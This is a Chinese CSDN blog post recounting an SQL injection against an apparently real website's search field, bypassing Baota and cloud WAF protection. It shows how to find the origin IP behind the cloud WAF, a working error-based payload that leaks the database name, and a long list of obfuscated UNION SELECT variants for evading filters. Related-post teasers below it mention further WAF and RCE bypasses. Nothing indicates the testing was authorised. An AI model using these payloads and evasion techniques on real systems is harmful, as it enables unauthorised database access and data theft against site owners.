记一次SQL注入绕过宝塔+云waf

最新推荐文章于 2024-04-11 17:05:02 发布
最新推荐文章于 2024-04-11 17:05:02 发布
阅读量636 收藏 10
点赞数 6
文章标签: sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51542789/article/details/135114042
版权

0x01 多重waf绕过

注入点搜索框

单双引号进行测试
看看是字符型的还是数字型的,发现是字符型

准备上语句发现有宝塔waf+云waf

**0x02 过云waf
**

首先看看有无cdn节点

全球ping

发现这两个没有回应真实ip,就去看看用fofa或者hunter来在真实ip,hunter上面显示183是云厂商肯定是云waf,不能用这个ip

之后在看fofa上面能不能找到真实ip

发现这个ip跟历史解析记录是同一个c段的

然后用拦截云waf的语句来试试,发现无云waf显示

找云waf的几种方式

1. 通过全球ping``2. 找历史解析记录``3. 通过fofa或者hunter空间引擎来搜索``4.  通过历史解析记录扫c段

0x03 过宝塔waf

1.报错注入

首先判断出字符型的话,就得去测试’||||’   ‘or+or’的语句,但是我发现他这里只要是在两个or之间出现东西,就一定会触发宝塔waf

当时试了很多思路,发现可以’;%00方法,还有可以加–+注释符的,但是尝试之后只有–+可以正常回显

其实这里最初的思路根本不是什么’||||’,这里是按照1’||1=1来测试

然后尝试想把1=1,后面这个1能不能换成报错函数之类的,发现直接被拦

所以我猜测这个是不是有可能把mysql所有的报错函数都给拦了一下,尝试其他的报错函数看看

exp

floor

例如:``Polygon,GeometryCollection,MultiPoint,MultiLineString``我发现这几个都没有过滤,可能就过滤了平常可见的报错函数

既然这函数可以用,那我们就开始构造语句试试,正常的语句用不了,那我们就玩点不正常的

看看这函数怎么搞的,把里面的语句替换成1,看看哪里出了问题,发包,发现他这个1直接爆出来了

尝试能不能select database()这样,把库名搞出来

发现还是不行
可能是因为database()后面跟着–没有闭合的原因,加个||’来试试能不能闭合

emmm,还是不行
既然select database()不行,那就试试再套一层报错函数,看看能不能行

Pyload:1'||1=geometryCollection(updatexml(1,concat(0x7e,database(),0x7e),1))--+

发包

哟西,果然能行,出库名了,成功绕过waf

2.联合注入

直接’ordre by  xx --+

正常判断出库名,17正常  18报错

然后fuzz  union select 函数,尝试太多截图就不放了,直接快进到最后一步

/*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f**%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/**/ /**//*!union*//**//*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ +UnIOn%0d%0aSeleCt%0d%0a UNION/*&test=1*/SELECT/*&pwn=2*/ un?+un/**/ion+se/**/lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f%252a /select%252f%252a*/ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f**%2funion%2f**%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A /*!UnIoN*/SeLecT+  %55nion(%53elect)   union%20distinct%20select   union%20%64istinctRO%57%20select   union%2053elect   %23?%0auion%20?%23?%0aselect   %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect   %55nion %53eLEct   u%6eion se%6cect   unio%6e %73elect   unio%6e%20%64istinc%74%20%73elect   uni%6fn distinct%52OW s%65lect

Pyload:

union+distinctROW+select

开始构造,pyload如图,发包

成功绕过

代码人生平平无奇
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
深入waf绕过盾,宝塔(1),2024年最新网络安全研发岗必问30+道高级面试题
2401_84264408的博客
04-11 530
从网络层获取的 ip,这种一般伪造不来,如果是获取客户端的 IP,这样就可能存在伪造 IP 绕过的情况。测试方法:修改 http 的 header 来 bypass wafX-Real-ip第二种方法我们是说这个IP地址是通过上面形式获取,在数据包里面,但是要看数据包里面waf的接受方式,因为在这个实战情况下面,他有可能接受你的IP地址是从网络层(tcp/ip)层面接受,如果这个层次数据库修改是不会接受的,意义不大,条件实在是太多,从请求来的数据包里面添加上面这五类。
渗透测试之waf绕过基础
qi_SJQ_的博客
01-28 3691
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 思维导图 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 思维导图: 一、信息收集 此处只针对对于目标网站直接扫描的信息收集讲解,其他辅助信息收集手段如:查旁站/识别cms等手段也不会遇到waf拦截。 1.安全狗—防ddos cenos目前用的不熟练,于是我将服务器系统换成了winserver,搭建上web环境和安全狗,打开cc拦截开关,本地.
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入中的WAF绕过技术
08-19
SQL注入中的WAF绕过技术,里面的思路很好,可以学习一下
SQL注入WAF小结
05-08
自己总结SQL注入WAF小结,有人能指点指点就更好啦。。
深入了解SQL注入绕过waf和过滤机制
02-11
深入了解SQL注入绕过waf和过滤机制
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
RCE绕过宝塔WAF(php)
weixin_43916797的博客
07-11 1195
1.参数bin2hex加密,例如phpinfo(): 编写脚本得到加密后的数据:706870696e666f28293b <?php $str = "phpinfo();"; $hex = bin2hex($str); echo($hex) ?> url的参数为:www.xx.com?x=hex=′706870696e666f28293b′;assert(pack("H∗",hex='706870696e666f28293b';assert(pack("H*",hex=′706870696e6
SQL注入——waf绕过
cldimd的博客
03-19 2460
什么是waf Web应用防护系统 (也称:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。也叫Web防火墙,主要是对Web特有入侵方式的加强防护,如DDOS防护、SQL注入、XML注入、XSS等。 防火墙 包过滤防火墙  隔绝网络 状态检测防火墙 应用层防火...
sql注入解决
hexiaoniao的博客
07-09 1850
sql注入解决
寻找sql注入的网站的方法(必看)
09-09
下面小编就为大家带来一篇寻找sql注入的网站的方法(必看)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
谷歌/FOFA搜索引擎使用
莫黎小天
01-21 3792
谷歌搜索引擎的使用 1.谷歌语法 利用搜索引擎在渗透测试过程搜索到特定页面的一种语法 “xxx” :将要搜索的关键字用引号括起来(表示完全匹配,即关键词不能分开,顺序也不能变) +:“xxx” +baidu.com 搜索xxx与baidu.com相关的内容 -: “xxx”-baidu.com 搜索结果里面除去baidu.com相关的内容 2.谷歌语法基础使用 site:指定域名,如:site:edu.cn inurl:用于搜索包含的url关键词的网页,如:inurl:login 搜索
堡塔WAF:强大的私有WAF防火墙,为您的网站安全保驾护航
最新发布
xdcent的博客
04-11 859
免费的WAF防火墙,首个支持ARM国产系统的WAF防火墙,有超高自由度的自定义拦截规则和可灵活配置各种限制访问,有效防CC攻击、防恶意采集、防刷接口等常见攻击和黑客渗透测试行为,为您的业务网站保驾护航
实战绕过宝塔PHP disable_function 限制getshell
zhangge3663的博客
03-09 3612
一、这次做的目标站点是一个某XX站点,通过前期的信息收集,可以发现该站点是由宝塔(一般根服务器开放端口888、8888和报错界面判定)+ShuipfCMS框架搭建的 端口信息 后台 二、默认的ShuipfCMS系统后台访问http://www.xxx.com/admin/会自动跳转到后台,但是这个站点感觉是被二次开发过的,站点后台和前端页面不在同一个子域名下,该后台还是通过收集子域名得到的,访问某xxx.xxx.com会自动跳转到后台登录页面。 三、这里想着尝试绕过验证码来对后台用户名密码进
「免费WAF」一核顶十核,防CC攻击就用堡塔WAF
zhwyeah的博客
02-29 108
堡塔WAF是一款国产免费的网站防火墙,我们致力于让用户使用免费版即可解决网站最常遇到的问题。如:开箱即用高效防御CC攻击假蜘蛛/爬虫自动拦截超灵活的自定义规则。
WAF - SQL注入绕过宝塔 靶场实战
weixin_54771278的博客
05-29 6010
实验介绍 宝塔面板是广东堡塔安全技术有限公司研发的服务器管理工具,是一家专门从事服务器相关软件及服务研发的公司,宝塔的愿景就是让使用者更简便的使用服务器。宝塔面板是一款服务器管理软件,支持windows和linux系统,可以通过Web端轻松管理服务器,提升运维效率。例如:创建管理网站、FTP、数据库,拥有可视化文件管理器,可视化软件管理器,可视化CPU、内存、流量监控图表,计划任务等功能。 宝塔面板拥有网站的防护功能,可以防止sql注入,挂马,cc攻击等网站入侵的功能 实验目的 1.掌握s...
宝塔面板的sql注入绕过
weixin_48421613的博客
03-24 7849
一次宝塔sql注入绕过宝塔防护sql注入尝试联合查询的尝试布尔盲注尝试真假盲注运用 宝塔防护 在一次挖cvnd漏洞的时候,遇到了宝塔面板的防护,此waf屏蔽了传统的注释符“–+”、"#"、 “/*” , union select 做了防护而且似乎还做了过滤,废了半天劲绕过去发现联合查询不能被执行了,order by 虽然能用但是也没了卵用,搞了半天搞了个寂寞,正当我就要放弃的时候,我想起了使用布尔盲注,结果…玛德法克… sql注入尝试 老生常谈了哈,日站第一步当然需要确定是不是真的存在sql注入 输入单
堡塔WAF:免费的私有WAF防火墙,有效拦截CC攻击、sql注入、xss、一句话木马等渗透攻击
linux8的博客
01-25 1694
在运维管理网站的同时,如果有遇到网站被挂马、sql注入、XSS跨站脚本、网页内容被篡改、页面盗链、网站内容数据泄露、网站被恶意扫描、cc攻击等一系列安全问题,推荐安装使用堡塔WAF,避免您的网站资产数据泄露,保障网站安全。堡塔WAF是基于宝塔面板千万级安装量的网站业务安全实战经验,打造的免费私有WAF防火墙,有效拦截CC攻击、sql注入、xss、一句话木马、防采集等常见渗透攻击,为您的业务网站保驾护航。录恶意攻击的拦截时间,攻击的网站对象以及攻击的URL地址,还有攻击IP及归属地和攻击类型。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值